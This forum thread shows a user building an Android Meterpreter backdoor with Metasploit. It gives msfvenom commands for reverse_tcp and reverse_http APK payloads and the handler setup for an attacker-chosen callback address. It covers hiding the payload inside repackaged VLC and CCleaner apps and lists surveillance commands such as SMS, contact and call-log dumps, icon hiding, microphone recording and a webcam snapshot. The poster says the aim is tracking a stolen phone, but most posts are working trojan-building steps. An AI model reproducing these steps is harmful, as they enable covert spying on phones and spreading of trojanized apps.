View previous topic :: View next topic |
Author |
Message |
niceflower Tux's lil' helper
Joined: 31 Mar 2017 Posts: 76
|
Posted: Mon Jun 26, 2017 6:38 pm Post subject: [SOLVED] android metasploit |
|
|
hello i have a question about a piece of software crafted with the metasploit framework,
it runs fine, only downside is that when the android phone goes into, idle, the meterpreter seems to die, and the only way to restart it, is by launching the payload icon on the android phone again.
for a free payload it does include cool features, however i can not seem to get the meterpreter consistent.
any ideas?
msfconsole:
the payload is called: msfvenom -p android/meterpreter/reverse_tcp LHOST= ip LPORT = 444 r > name.apk
payload is set with:
Code: | set PAYLOAD android/meterpreter/reverse_tcp |
it would be nice to have a consistent connection to my phone so i can track if it gets stolen, using google maps.
i know little about who made this payload into the metasploit framework, or if anyone else knows something about it.
*edit* only way i can seem to start the meterpreter is by pressing the icon on the phone
the solution would be to make the .apk auto run each time after idle, or even better make it auto run 24/7
i just checked the same payload on my galaxy tab 3, and there the meterpreter stays consistent even when on idle,
so the problem is related to my Huawei p8 phone.
Last edited by niceflower on Tue Jun 27, 2017 12:29 am; edited 1 time in total |
|
Back to top |
|
|
niceflower Tux's lil' helper
Joined: 31 Mar 2017 Posts: 76
|
Posted: Tue Jun 27, 2017 12:11 am Post subject: |
|
|
ok i found it: about the huawei P8 instead of creating tcp:
Code: | msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=4444 -o name.apk |
*to make the payload work outside the lan network for example with 4G mobile network, just use LHOST=your external public ip, and then to start the meterpreter set LHOST=your internal boxen ip
i used http:
Code: | msfvenom -p android/meterpreter/reverse_http LHOST=ip LPORT=4444 -o name.apk |
then to start msfconsole:
Code: | msfconsole
use multi/handler
set PAYLOAD android/meterpreter/reverse_http
set LHOST (put ip here)
set LPORT 4444
exploit
? |
when closing down metasploit, and restarting, there is actually no interaction needed with the android device to start a new meterpreter shell.
only downside for now, is that the reverse_http payload can not take webcam snap, stream, wlan_geolocate and some other features, when the telephone is on idle,
however this is not a real concern at this moment for me.
last edit*
i just noticed a wakelock option so everything is working on idle too now with the reverse_http payload on port 4444
sorry for being a bit Gentoo off-topic |
|
Back to top |
|
|
niceflower Tux's lil' helper
Joined: 31 Mar 2017 Posts: 76
|
Posted: Wed Jun 28, 2017 6:13 pm Post subject: |
|
|
Hello !
i explored my android metasploit project, and noticed that is was possible to build in the PAYLOAD into VLC.apk (video lan) and ccleaner.apk (a tool to clean up a phone)
these websites can be very usefull on how to embed the compromised .apk into any existing .apk:
https://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/
https://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-0166901/
i can say it works and vlc is running on my huawei P8 now these are some commands from the meterpreter shell on my Kali Rolling Live:
the wakelock command is a bit bugged, and keeping the meterpreter consistent is art.
i have tried to look into creating a service in the vlc.apk with Android Studio Linux: i am stuck on how to create the service hook at this point, to let it run 24/7.
the problem seems still that the meterpreter shell dies over time
*edit*
this proves how important it is to "not allow app from untrusted source" turned on in Android, because any .apk from untrusted source, can be manipulated.
Code: | meterpreter > ?
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getuid Get the user that the server is running as
localtime Displays the target system's local date and time
pgrep Filter processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Android Commands
================
Command Description
------- -----------
activity_start Start an Android activity from a Uri string
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
hide_app_icon Hide the app icon from the launcher
interval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
set_audio_mode Set Ringer Mode
sqlite_query Query a SQLite database from storage
wakelock Enable/Disable Wakelock
wlan_geolocate Get current lat-long using WLAN information
meterpreter > webcam_snap
[-] Error running command webcam_snap: Rex::TimeoutError Operation timed out.
meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/OuZRSbmh.jpeg
meterpreter >
|
|
|
Back to top |
|
|
|
|
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
|